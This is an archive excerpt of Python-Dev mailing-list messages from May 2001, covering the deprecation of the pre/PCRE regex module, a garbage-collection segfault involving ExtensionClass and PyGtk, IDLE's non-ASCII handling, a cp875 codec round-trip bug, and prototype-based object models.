Subject: [Python-Dev] status of pre?
Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>

  Have we formulated a plan of action regarding PCRE and the pre
module?  Are we planning to leave them in for another version, or is
SRE considered sufficiently stable?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From sdm7g at Virginia.EDU  Fri May 11 18:29:30 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 12:29:30 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105111130290.234-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Fred L. Drake, Jr. wrote:
> 
> Martin v. Loewis writes:
>  > Is it really the case that the Mac API hasn't grown a chdir call in 13
>  > years?
> 
>   Yikes!  I just search developer.apple.com for "chdir" and came up
> with no hits, but I really don't know just what that tells me.
> chdir() is required for POSIX compliance, but it isn't mentioned in
> the C9X final committee draft.


 There isn't a chdir in any of the pre-OSX Mac *system* libraries, and
Mac has never claimed any POSIX compliance (even with OSX, they have
officially said it's almost certainly POSIX compliant but they have
no plans for now to got thru the hoops and paperwork to get it 
certified.) 

 chdir is in unistd.h, which isn't part of the standard C library.

 However, Metrowerks *compiler* and IDE for the Mac does include in
MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW 
selling development tools obviously has more interest in being 
POSIX compliant than Apple! )


 I don't know if there's one in the MPW libraries, so maybe you
still want to leave it there. 

 -- Steve Majewski


From guido at digicool.com  Fri May 11 20:47:38 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 13:47:38 -0500
Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400."
             <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> 
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> 
Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com>

>   Have we formulated a plan of action regarding PCRE and the pre
> module?  Are we planning to leave them in for another version, or is
> SRE considered sufficiently stable?

Hm.  It should disappear but I believe I've heard people say they were
focred to use it because of the recursion limit problems with SRE on
some platforms.

We could put a warning on using pre or pcre in 2.2, and remove it in
2.3, hoping that /F fixes the recursion limit problems in the mean
time (weren't those related to the backtracking implementation)?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Fri May 11 22:41:30 2001
From: skip at pobox.com (skip at pobox.com)
Date: Fri, 11 May 2001 15:41:30 -0500
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <15100.20090.573866.569667@beluga.mojam.com>

Has anyone investigated interactions between ExtensionClass objects and GC?
I've encountered segfaults with 2.1 in certain situations when using the
latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
get using ExtensionClasses.  Any ideas how I should approach the problem?  I
don't know either piece of code at all and the code that generates the
segfault isn't particularly small, not to mention which it uses the bleeding
edge Gtk stuff (which I doubt anyone on this list will have installed) and a
version of ExtensionClass patched by James Henstridge, the PyGtk author.

Here's what I know:

    1. Disabling gc gets rid of the segfault
    2. I only see the problem with importing a specific module that
       subclasses the GtkTextView widget from the Python command line.  If I
       run it as a script from the shell prompt, I get no segfault.
    3. If I first import the gtk module, then import my module, I get no
       segfault. 
    4. Most changes I make to the module causing the problem cause the
       problemm to disappear.

All told, all this really tells me is I'm probably dealing with a
malloc/free problem of some sort.

Neil and/or Jim (and/or anyone else willing to look into this problem), I
can give you access to my development machine via ssh if you think that
would help debug the problem.

Skip

#0  0x0807163d in visit_decref (op=0x4034ece0, data=0x0)
    at ../Modules/gcmodule.c:153
#1  0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
#2  0x08071672 in subtract_refs (containers=0x80b8ac0)
    at ../Modules/gcmodule.c:167
#3  0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc)
    at ../Modules/gcmodule.c:379
#4  0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484
#5  0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507
#6  0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149
#7  0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244
#8  0x401f0979 in initializeBaseExtensionClass (self=0x4034d320)
    at ExtensionClass.c:1485
#9  0x401f6774 in export_subclassed_type (dict=0x82d33a4, 
    name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4)
    at ExtensionClass.c:3410
#10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, 
    class_name=0x40337c55 "GtkTreeViewColumn", 
    get_type=0x404c4080 <gtk_tree_view_column_get_type>, ec=0x4034d320, 
    bases=0x82ea9a4) at gobjectmodule.c:202
#11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071
#12 0x402f0ed0 in init_gtk () at gtkmodule.c:98
#13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", 
    pathname=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52
#14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, 
    buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", 
    type=3) at ../Python/import.c:1296
#15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", 
    fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815
#16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, 
    p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc)
    at ../Python/import.c:1671
#17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, 
    locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522
#18 0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", 
    globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864)
    at ../Python/import.c:1563
#19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124)
    at ../Python/bltinmodule.c:31
#20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2838
#21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2801
#22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734
#23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c) at ../Python/ceval.c:346
#25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", 
    co=0x82910d0, 
    pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490
#26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754
#27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, 
    buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", 
    type=1) at ../Python/import.c:1287
#28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk")
    at ../Python/import.c:811
#29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, 
    buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5)
    at ../Python/import.c:1310
#30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", 
    fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815
#31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac)
    at ../Python/import.c:1671
#32 0x08067bcc in import_module_ex (name=0x0, globals=0x828c3fc, 
    locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522
#33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", 
    globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#34 0x0809f4b9 in builtin___import__ (self=0x0, args=0x829651c)
    at ../Python/bltinmodule.c:31
#35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2838
#36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2801
#37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734
#38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc) at ../Python/ceval.c:346
#40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", 
    co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490
#41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", 
    pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754
#42 0x0806775e in load_module (name=0xbfffeff0 "seg", fp=0x820cd60, 
    buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287
#43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", 
    fullname=0xbfffeff0 "seg") at ../Python/import.c:1815
#44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec)
    at ../Python/import.c:1671
#45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, 
    locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522
#46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", 
    globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4)
    at ../Python/bltinmodule.c:31
#48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2838
#49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2801
#50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734
#51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4) at ../Python/ceval.c:346
#53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "<stdin>", 
    globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708)
    at ../Python/pythonrun.c:1045
#54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:570
#55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:510
#56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", closeit=0, flags=0xbffff708)
    at ../Python/pythonrun.c:473
#57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320
#58 0x400831f0 in __libc_start_main () from /lib/libc.so.6


From guido at digicool.com  Fri May 11 23:49:00 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 16:49:00 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST."
             <15100.20090.573866.569667@beluga.mojam.com> 
References: <15100.20090.573866.569667@beluga.mojam.com> 
Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com>

> Has anyone investigated interactions between ExtensionClass objects and GC?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
> intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
> get using ExtensionClasses.  Any ideas how I should approach the problem?  I
> don't know either piece of code at all and the code that generates the
> segfault isn't particularly small, not to mention which it uses the bleeding
> edge Gtk stuff (which I doubt anyone on this list will have installed) and a
> version of ExtensionClass patched by James Henstridge, the PyGtk author.
> 
> Here's what I know:
> 
>     1. Disabling gc gets rid of the segfault
>     2. I only see the problem with importing a specific module that
>        subclasses the GtkTextView widget from the Python command line.  If I
>        run it as a script from the shell prompt, I get no segfault.
>     3. If I first import the gtk module, then import my module, I get no
>        segfault. 
>     4. Most changes I make to the module causing the problem cause the
>        problemm to disappear.
> 
> All told, all this really tells me is I'm probably dealing with a
> malloc/free problem of some sort.
> 
> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

AFAIK, the latest version of Zope (which uses ExtensionClass
extensively if not exclusively :-) works fine with Python 2.1.

This suggests pointing a finger towards the PyGtk code... :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From loewis at informatik.hu-berlin.de  Fri May 11 22:53:55 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Fri, 11 May 2001 22:53:55 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>

Thanks to a bug report I got, I noticed for the first time that you
cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
prompt, you may get

>>> s='??'
UnicodeError: ASCII encoding error: ordinal not in range(128)

Likewise, when trying to save a file that has non-ASCII characters,
you get a traceback.

Now, I think I understand all the causes of the problem (Tkinter
returning Unicode objects, and so on). However, I'm curious whether
anybody has proposals on how to deal with it.

For saving text files, if Python had an encoding directive, things
might be easier :-) For the shell prompt, I've no idea how to solve
this best.

So any suggestions are welcome.

Regards,
Martin


From fredrik at pythonware.com  Sat May 12 00:18:27 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 00:18:27 +0200
Subject: [Python-Dev] status of pre?
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>  <200105111847.NAA05835@cj20424-a.reston1.va.home.com>
Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid>

guido wrote:
> 
> We could put a warning on using pre or pcre in 2.2, and remove it in
> 2.3, hoping that /F fixes the recursion limit problems in the mean
> time (weren't those related to the backtracking implementation)?

2.2 is to be released in october, right?  I'm sure I could shake
out the remaining bugs in my "stackless SRE" patch until then...

Cheers /F


From fredrik at effbot.org  Sat May 12 01:03:10 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:03:10 +0200
Subject: [Python-Dev] Hats off to them!
Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid>

http://www.theregister.co.uk/content/4/18909.html

    "Microsoft Altair BASIC legend talks about Linux, CPRM and
    that very frightening photo

    ...

    His other passion, he tells us, is Python. 

    "Hats off to them. It's an extremely well designed language. It's
    object orientated from the get-go. They've really succeeded there,"
    he says, and commends it as the ideal teaching language. That
    used to be BASIC, of course"

    ...

(no, it's not Bill)

Cheers /F


From fredrik at effbot.org  Sat May 12 01:14:47 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:14:47 +0200
Subject: [Python-Dev] Hats off to them!
References: <014a01c0da6e$93578ca0$e46940d5@hagrid>
Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid>

>     "Hats off to them. It's an extremely well designed language. It's
>     object orientated from the get-go. They've really succeeded there,"
>     he says, and commends it as the ideal teaching language. That
>     used to be BASIC, of course"

reading on, I'm not sure why BASIC ever was the ideal teaching
language:

http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11

    "One of the nice things about this BASIC is it has this so called
    direct mode. So you can PRINT 2 + 2. It prints the square root
    of ten"

Cheers /F


From sdm7g at Virginia.EDU  Sat May 12 04:43:31 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 22:43:31 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>
Message-ID: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Thomas Heller wrote:

> I never looked at Self or other prototype based systems.
> Is it really true that prototypes are a lot simpler than
> metaclasses, but on the other hand more powerful?

Definitely simpler: No classes, No metaclasses, only objects.

Ignore for now the fact that a limited set of classes are 
handier for a statically type checked language and just 
consider dynamic languages, which is their proper domain.      

Prototype semantics  basicalaly subsume class semantics. 
Any object can be an exemplar and fill the role of a class,
and it can be used ONLY as a template and holder of shared
behaviour, so it can be used like a class. 

[One of the self papers -- one which I haven't read -- is
entitled "Self includes Smalltalk"  -- and is, I believe,
a demonstration that SmallTalk is sort of a subset of Self.]


But you can also have finer grain classification and you 
can have object inheritance. ( This is handly in XlispStat,
which is oriented towards statistics and analysis: you can
have derived objects, for example different subsamples of
the same population, or in my app, different energy spectra,
along with derived and processed spectra with special rules
for treatment: e.g. linear filtered spectra have a filter
function or kernel, and if they are fit against reference
spectra, they need to be fit against references that have 
had the same filter applied to them -- if none available
create one from unfiltered samples -- and maybe a whole
chain of derived data. In a class based system, you would
have to manually maintain a separate linked list of objects,
but in a prototype system they can all be cloned from their
parent objects. )   

The other plus for things like exploratory statistics is that
you don't have to design a class hierarchy ahead of time -- 
it more concrete and less abstract than a class based system.

Prototypes can also solve some of the sort of problems that
Jim Fultons acquisition framework in Zope is designed to 
handle. (But it's been a while since I read that paper and
I haven't used it, so I'm relying on my memory of thinking
"Yeah -- that would be simpler with prototypes" ) 

You definitely don't have to worry about simulating the 
Prototype Pattern. (I've seen GUI systems in C++ that go
thru a lot of code to add prototype-like behavior to C++ classes.) 


But -- unless I can figure a useful way to use it under the
covers, it's not really a topic for python-dev.  


> The 'brain exploding properties' of metaclasses are IMO
> only there because my brain cannot think easily in too
> many recursion steps...

It's just like spelling bananana -- the problem is to know
when to stop! ;-)


-- Steve Majewski


From tim_one at email.msn.com  Sat May 12 13:28:27 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 07:28:27 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>

I have a way to make dict lookup a teensy bit cheaper(*) that significantly
reduces the number of collisions (which is much more valuable).

This caused a number of std tests to fail, because they were implicitly
relying on the order in which a dict's entries are materialized via .keys()
or .items().

Most of these were easy enough to fix.  The last failure remaining is
test_unicode, and I don't know how to fix it.  It's dying here:

    try:
        verify(unicode(s,encoding).encode(encoding) == s)
    except TestFailed:
        print '*** codec "%s" failed round-trip' % encoding
    except ValueError,why:
        print '*** codec for "%s" failed: %s' % (encoding, why)

when encoding == "cp875".  There's a bogus problem you have to worm around
first:  test_unicode neglected to import TestFailed, so it actually dies
with NameError while trying the "except TestFailed" clause after verify()
raises TestFailed.  Once that's repaired, it's complaining about failing the
round-trip encoding.

The original character in s it's griping about is "?" (0x3f).  cp875.py has
this entry in its decoding_map dict:

	0x003f: 0x001a,	# SUBSTITUTE

But 0x1a is not a *unique* value in this dict.  There's also

	0x00dc: 0x001a,	# SUBSTITUTE
	0x00e1: 0x001a,	# SUBSTITUTE
	0x00ec: 0x001a,	# SUBSTITUTE
	0x00ed: 0x001a,	# SUBSTITUTE
	0x00fc: 0x001a,	# SUBSTITUTE
	0x00fd: 0x001a,	# SUBSTITUTE

Therefore what appears associated with 0x1a in the derived encoding_map
dict:

encoding_map = {}
for k,v in decoding_map.items():
    encoding_map[v] = k

may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
so happened to map back to 0x3f before, but to 0xfd after the dict change,
so "?" doesn't survive the round trip anymore.

My knowledge of encoding internals is exceeded only by my mastery of file
URLs under Windows <wink>, so I could sure use some help getting this
repaired.  I'd really like to check in the dict improvement (+ test
repairs), but won't do it so long as it makes a std test fail.  If, e.g.,
you're *relying* on "the first" of a set of ambiguous reverse mappings
winning the game, then iterating over decoding_map.items() in reverse sorted
order would do the trick reliablly.  But I don't know whether the ambiguity
in cp875 is a bug or an undocumented feature ...

7-bit-ascii-looks-better-every-day<wink>-ly y'rs  - tim


(*) Simply by taking the damn "~" off "~hash" -- I explained quite a while
ago why that can lead to a weak form of clustering "in theory", and
instrumenting the dict lookup code confirmed that it does hurt in real life.


From guido at digicool.com  Sat May 12 14:28:23 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 07:28:23 -0500
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400."
             <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu> 
References: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu> 
Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>

Do prototype-based language have the equivalence of multiple
inheritance?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim_one at email.msn.com  Sat May 12 14:16:33 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 08:16:33 -0400
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>

[Guido]
> Do prototype-based language have the equivalence of multiple
> inheritance?

Just as for class-based languages, whether a prototype-based language
supports an MI workalike varies by language.  In a class-based language with
MI, a class can have multiple base classes; in a prototype-based language
with an MI workalike, an object can have multiple prototype objects.  The
same kinds of ambiguities can arise, and the same kinds of resolution
strategies are applicable (imposed linearization; user-supplied
qualification; user-supplied renaming; guessing <0.7 wink>).

JavaScript is the best-known prototype language that does not support
multiple prototypes per object.  A very readable intro to its object model
is here:

  http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf

It's interesting because, near the end, the author explores a bit how far
you can get *trying* to fake MI in JS.  The answer is "farther than you
might think", but not all the way.


From fredrik at pythonware.com  Sat May 12 14:25:43 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 14:25:43 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid>

tim wrote:
> If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings
> winning the game, then iterating over decoding_map.items() in reverse sorted
> order would do the trick reliably.

reverse sorting makes sense to me.  but the cp-files appear to be
machine generated, so patching that python file won't help.

> But I don't know whether the ambiguity in cp875 is a bug or an undocumented
> feature ...

a truly future-proof solution would be to specify exactly how to resolve
every many-to-one mapping, for every font having that problem.  but
sorting them is clearly better than relying on implementation-dependent
behaviour...

(is Jython using exactly the same hashing and dictionary algorithms as
CPython?  or does it work by accident also under Jython?)

Cheers /F


From nas at python.ca  Sat May 12 16:28:54 2001
From: nas at python.ca (Neil Schemenauer)
Date: Sat, 12 May 2001 07:28:54 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500
References: <15100.20090.573866.569667@beluga.mojam.com>
Message-ID: <20010512072854.A4271@glacier.fnational.com>

skip at pobox.com wrote:
> 
> Has anyone investigated interactions between ExtensionClass objects and GC?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.

Do any of the PyGtk objects define the GC type flag?

The GC is fairly good a exposing memory management bugs that
otherwise go unnoticed.  If you're using glib you can try setting
the MALLOC_CHECK_ environment variable to 2.  If you've got lots
of memory you could also try using electric fence and running
your program.  Finally, you might try compiling with Py_DEBUG
set.

> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

I'd be willing to take a look (the chances of me reproducing it
don't look good).  A public RSA key is attached.

  Neil

1024 35 137239219965727437168672191918903379374375693016714793361229775412659825927393161529979393960653570460772264478344617383839228413657344788196731901259658832080205387752175259876861415566787275112151657197829855666024930817293398722707127849748769398037860296053992448539154897117015626552934877126704135564999 nas

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 240 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010512/39a524f2/attachment.pgp>

From sdm7g at Virginia.EDU  Sat May 12 17:07:06 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 11:07:06 -0400 (EDT)
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>
Message-ID: <Pine.NXT.4.21.0105121011450.241-100000@localhost>


[Guido]
> Do prototype-based language have the equivalence of multiple
> inheritance?
 
Yeah ... What Tim said... 

Also: There are two basic implementation models:

Delegation  [a.k.a. "Lifetime sharing", cloning]
  sort of like python -- if you don't know how to handle it "ask" 
  a parent object. ( "ask" in quotes, because I've recently been
  in a long argument about whether objective-C & smalltalk can
  really be said to "send messages" , or if it's "just" dynamic
  lookup and function application! ) 

Extension  [a.k.a. "Birth sharing", copying, concatenation ]
  more like how I imaging C++ vtables are built -- the python 
  equivalent would be like merging all of the class __dict__'s
  together with name-clase priority going to the nearest
  relative. 

( "Life Sharing" vs. "Birth Sharing" -- is a change in the
  base class after object creation inherited by the object? )

 I think most Multiple-Inheritance languages use delegation, but
no reason it won't work in extension. The diff is that in extension,
everything has to get resolved at object creation. 
 Extension could be made more flexible if on creation, you could 
not only add new methods, but rearrange and control the extension
process ( sort of like "from xxx import yyy; from aaa import bbb" ).
 I would think one could use delegation by default, but provide 
an extension mechanism as an optimization, but I don't know if 
there's any system that does this. 

 If it follows the paradigm, a prototype system doesn't have an 
'isa' or '__class__' slot -- only a (linked) list of parent objects.
But if you were simulating class orientation, one would add 
an 'isa' slot for the immediate prototype, and probably enforce
some restrictions on the prototype objects that were playing the
role of class objects. 

 "If it follow the paradigm" -- as in OO in general, there are
several flavors and implementations and some are may be  hybrid
systems. 
  Self is the language most widely known as a prototype based 
language: some others: Newtonscript (from apple's late lamented
Newton palmtop), Kevo (a forth based o-o language), Cardelli's
Obliqu (This didn't stick in my mind from when I read the papers
back in the "safe python" development days, but it's listed in
my book.) as well as XlispStat's object system. (which isn't 
listed in that book but there is an ObjectLisp -- I don't know
if they were at all related. ) -- and Tim said JavaScript. 
The Amulet and Garnet GUI systems are prototype based -- Garnet
written in Lisp and Amulet in C++. 

 For NewtonScript, Kevo, and maybe JavaScript, I suspect the
simplicity of the system was a motivation. 
 
("the book" I'm reading is "Prototype-Based Programming -- Concepts,
Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan
Moore, pub. Springer. A collection of papers, some of which are 
available on the Web -- I know the Self papers, one description of
NewtonScript, and one or two articles on Kevo are online, as well
as Cardelli's Obliq paper. )


-- "Steve" Majewski


From martin at loewis.home.cs.tu-berlin.de  Sat May 12 21:16:58 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 21:16:58 +0200
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>

> Has anyone investigated interactions between ExtensionClass objects
> and GC?

At some point, extension classes used a literal copy of
PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
and only had the spare fields that were expected then. Today,
PyTypeObject has much more fields, so extension objects produce random
errors (eg. with GC) when used in a modern interpreter (where the copy
has not been synchronized). Whatever immediately follows the type
object in memory may be interpreted as GC flag.

Regards,
Martin


From guido at digicool.com  Sat May 12 23:08:05 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:08:05 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200."
             <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> 
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> 
Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com>

> At some point, extension classes used a literal copy of
> PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
> and only had the spare fields that were expected then. Today,
> PyTypeObject has much more fields, so extension objects produce random
> errors (eg. with GC) when used in a modern interpreter (where the copy
> has not been synchronized). Whatever immediately follows the type
> object in memory may be interpreted as GC flag.

